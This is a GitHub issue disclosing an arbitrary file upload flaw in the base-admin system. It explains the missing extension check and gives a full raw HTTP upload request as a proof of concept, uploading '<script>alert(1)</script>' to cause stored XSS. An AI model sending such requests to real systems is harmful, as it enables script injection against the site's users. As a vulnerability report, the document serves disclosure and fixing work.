Skip to content

The base-admin system contains an arbitrary file upload vulnerability. #38

Description

@Jszdk

Vulnerability Description

The base-admin management system contains an arbitrary file upload vulnerability. Attackers can upload any file type. Although the target environment does not support JSP parsing, it can still upload HTML files, potentially leading to a stored XSS attack.

Vulnerability Analysis

1、The program does not validate the file extension of user-uploaded files.(SysFileController.java)

Image

2、Simply concatenate the filename and file extension and save.

Image

Vulnerability Reproduction

1、Send the following request packet

Image

2、Accessing the corresponding URL successfully triggered an XSS attack.

Image

POST /baseadmin/sys/sysFile/upload HTTP/1.1
Host: 10.23.200.67:8888
Content-Length: 206
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.23.200.67:8888/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylzFJY9ml6Bzi2DVo
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=857CA252B9A86ECC7D5D73A6801404F4; remember-me=WTI0MlM4bFJmRnVjZnp5RXJ4cVVlUSUzRCUzRDolMkZGZCUyQmtuM3ZuJTJGZXUlMkZaWnU2ajBRdlElM0QlM0Q
Connection: keep-alive
------WebKitFormBoundarylzFJY9ml6Bzi2DVo
Content-Disposition: form-data; name="file"; filename="123.jsp"
Content-Type: image/jpeg

<script>alert(1)</script>

------WebKitFormBoundarylzFJY9ml6Bzi2DVo--

Activity

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

      Milestone

      No milestone

      Relationships

      None yet

      Development

      No branches or pull requests

      Issue actions